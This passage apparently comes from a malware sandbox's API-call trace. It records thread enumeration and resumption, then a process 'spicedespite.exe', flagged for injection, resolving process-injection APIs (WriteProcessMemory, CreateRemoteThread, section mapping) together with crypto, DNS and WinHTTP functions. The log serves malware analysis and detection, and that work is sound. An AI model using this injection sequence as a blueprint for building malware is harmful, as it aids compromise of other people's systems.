(hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.312] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.312] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.313] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.313] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.313] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.313] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.314] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.314] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.314] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.315] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.315] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.315] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.315] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.316] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.316] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.316] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.316] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.317] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.317] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.317] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.318] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.318] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.318] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.318] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.319] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.319] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.319] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.319] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.320] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.320] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.320] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.321] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.321] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.321] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.321] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.322] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.322] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.322] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.322] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.323] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.323] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.323] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.324] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.324] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.324] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.324] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.325] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.325] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.325] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.326] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.326] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.326] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.326] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.327] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.327] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.327] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.327] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.328] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.328] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.328] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.329] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.329] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.329] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.329] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.330] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.330] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.330] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.331] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.331] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.331] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.332] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.332] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.332] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.332] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.333] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.333] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.333] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.334] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.334] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.334] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.334] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.335] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.335] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.335] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.335] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.336] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.336] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.336] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.337] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.337] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.337] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.337] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.338] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.338] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.338] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.338] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.339] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.339] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.339] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.340] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.340] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.340] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.340] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.341] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.341] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.341] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.341] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.342] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.342] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.342] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.343] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.343] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.343] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.343] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.344] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.344] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.344] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.344] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.345] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.345] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.345] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.346] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.346] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.346] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.346] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.347] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.347] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.347] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.347] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.348] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.348] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.348] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.348] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.349] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.349] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.349] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.350] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.350] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.350] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.350] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.351] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.351] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.351] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.351] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.352] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.352] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.352] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.353] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.353] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.353] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.353] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.354] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.354] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.354] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.354] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.355] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.355] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.355] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.356] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.356] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.356] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.356] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.357] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.357] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.420] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.420] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.420] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.421] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.421] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.421] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.421] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.422] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.422] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.422] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.422] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.423] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.423] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.423] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.424] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.424] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.424] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.424] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.425] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.425] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.425] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.425] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.426] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.426] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.426] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.426] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.427] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.427] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.427] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.428] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.428] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.428] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.428] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.429] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.429] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.429] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.430] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.430] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.430] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.430] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.431] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.431] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.431] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.431] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.432] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.432] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.432] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.433] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.433] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.433] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.433] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.434] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.434] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.434] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.434] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.435] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.435] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.435] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.436] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.436] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.436] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.437] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.437] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.437] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.438] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.438] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.438] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.438] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.439] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.439] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.439] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.439] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.440] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.440] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.440] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.441] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.441] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.441] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.441] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.459] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7c0) returned 0x8c [0172.459] ResumeThread (hThread=0x8c) returned 0x1 [0172.459] CloseHandle (hObject=0x8c) returned 1 [0172.459] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a8) returned 0x8c [0172.459] ResumeThread (hThread=0x8c) returned 0x1 [0172.460] CloseHandle (hObject=0x8c) returned 1 [0172.523] CloseHandle (hObject=0x88) returned 1 [0172.524] VirtualQuery (in: lpAddress=0x320a00, lpBuffer=0x218f9a4, dwLength=0x1c | out: lpBuffer=0x218f9a4*(BaseAddress=0x320000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.524] GetProcessHeap () returned 0x300000 [0172.524] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x320a00 | out: hHeap=0x300000) returned 1 [0172.524] VirtualQuery (in: lpAddress=0x3208f0, lpBuffer=0x218f9a4, dwLength=0x1c | out: lpBuffer=0x218f9a4*(BaseAddress=0x320000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.524] GetProcessHeap () returned 0x300000 [0172.524] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3208f0 | out: hHeap=0x300000) returned 1 [0172.524] RtlExitUserThread (Status=0x0) Process: id = "34" image_name = "spicedespite.exe" filename = "c:\\program files\\common files\\spicedespite.exe" page_root = "0x66150000" os_pid = "0x58c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Common Files\\spicedespite.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 266 os_tid = 0x9a4 Thread: id = 267 os_tid = 0x488 Thread: id = 268 os_tid = 0xb44 [0172.110] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0172.110] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0172.111] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0172.112] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0172.113] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0172.113] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0172.113] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0172.114] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0172.114] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0172.114] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0172.114] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0172.114] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0172.114] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0172.122] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0172.122] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0172.122] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0172.126] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0172.126] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0172.126] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0172.126] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0172.126] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0172.126] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0172.127] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0172.127] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0172.127] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0172.127] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0172.127] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0172.127] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0172.129] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0172.129] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0172.130] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0172.130] LoadLibraryA 